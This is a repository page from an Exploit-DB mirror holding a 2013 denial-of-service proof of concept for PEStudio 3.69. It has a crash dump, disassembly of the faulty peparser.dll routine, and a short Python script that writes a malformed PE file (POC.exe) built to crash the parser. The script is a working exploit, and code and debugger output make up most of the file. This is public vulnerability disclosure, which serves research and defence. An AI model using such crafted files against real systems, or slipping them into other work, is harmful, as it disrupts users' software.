bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/dos/25972.py
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

92 lines
No EOL
4 KiB
Python
Executable file
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Title: PEStudio Version 3.69 Denial of Service
# Date: 5th June 2013
# Author: Debasish Mandal ( https://twitter.com/debasishm89 )
# Blog : http://www.debasish.in/
# Software Homepage: http://www.winitor.com/
# Version: PEStudio Version 3.69
# Tested on: Windows XP SP2 / Windows 7
# Vendor Patch : Recently released stable version (v6.91) is not affected.
'''
[+] Affected Module : peparser.dll version 3.69
[+] Crash Point:
(6b4.17c): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=41414141 ecx=013f41d9 edx=013f0080 esi=00000000 edi=00004141
eip=3001ce70 esp=0012d15c ebp=00a26100 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000206
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Documents and Settings\debasish mandal\Desktop\Tools\PeStudio369\PeParser.dll -
PeParser!PeParser::IPeParserFactory::Destroy+0xf1d0:
3001ce70 8b510c mov edx,dword ptr [ecx+0Ch] ds:0023:013f41e5=????????
0:000> u eip
PeParser!PeParser::IPeParserFactory::Destroy+0xf1d0:
3001ce70 8b510c mov edx,dword ptr [ecx+0Ch]
3001ce73 3bda cmp ebx,edx
3001ce75 7209 jb PeParser!PeParser::IPeParserFactory::Destroy+0xf1e0 (3001ce80)
3001ce77 8b6908 mov ebp,dword ptr [ecx+8]
3001ce7a 03ea add ebp,edx
3001ce7c 3bdd cmp ebx,ebp
3001ce7e 720c jb PeParser!PeParser::IPeParserFactory::Destroy+0xf1ec (3001ce8c)
3001ce80 46 inc esi
[+] IDA Pro Snap of the Buggy Function:(Code from peparser.dll version 3.69)
.text:3001CE40 sub_3001CE40 proc near ; CODE XREF: sub_30003510+154p
.text:3001CE40 ; sub_300184D0+4Bp
.text:3001CE40 mov ecx, [ecx+4]
.text:3001CE43 xor eax, eax
.text:3001CE45 test ecx, ecx
.text:3001CE47 jz short locret_3001CE91
.text:3001CE49 mov edx, [ecx+1Ch]
.text:3001CE4C movzx ecx, word ptr [edx+14h]
.text:3001CE50 lea ecx, [ecx+edx+18h]
.text:3001CE54 test ecx, ecx
.text:3001CE56 jz short locret_3001CE91
.text:3001CE58 test ebx, ebx
.text:3001CE5A jz short locret_3001CE91
.text:3001CE5C push esi
.text:3001CE5D push edi
.text:3001CE5E movzx edi, word ptr [edx+6]
.text:3001CE62 xor esi, esi
.text:3001CE64 test edi, edi
.text:3001CE66 jle short loc_3001CE8F
.text:3001CE68 push ebp
.text:3001CE69 lea esp, [esp+0]
.text:3001CE70
.text:3001CE70 loc_3001CE70: ; CODE XREF: sub_3001CE40+46j
.text:3001CE70 mov edx, [ecx+0Ch] <-- Crash
.text:3001CE73 cmp ebx, edx
.text:3001CE75 jb short loc_3001CE80
.text:3001CE77 mov ebp, [ecx+8]
.text:3001CE7A add ebp, edx
.text:3001CE7C cmp ebx, ebp
.text:3001CE7E jb short loc_3001CE8C
.text:3001CE80
.text:3001CE80 loc_3001CE80: ; CODE XREF: sub_3001CE40+35j
.text:3001CE80 inc esi
.text:3001CE81 add ecx, 28h
.text:3001CE84 cmp esi, edi
.text:3001CE86 jl short loc_3001CE70
.text:3001CE88 pop ebp
.text:3001CE89 pop edi
.text:3001CE8A pop esi
.text:3001CE8B retn
.text:3001CE8C ; ---------------------------------------------------------------------------
[+] Proof of Concept :
'''
# /usr/bin/python
header = "MZ"
header += "A"*58
header += "\x80\x00\x00\x00"
header += "A"*3
header += "\x0e"
header += "A"*60
header += "PE"
header += "A"*235
f = open('POC.exe','wb')
f.write(header)
f.close()
Reference in a new issue View git blame Copy permalink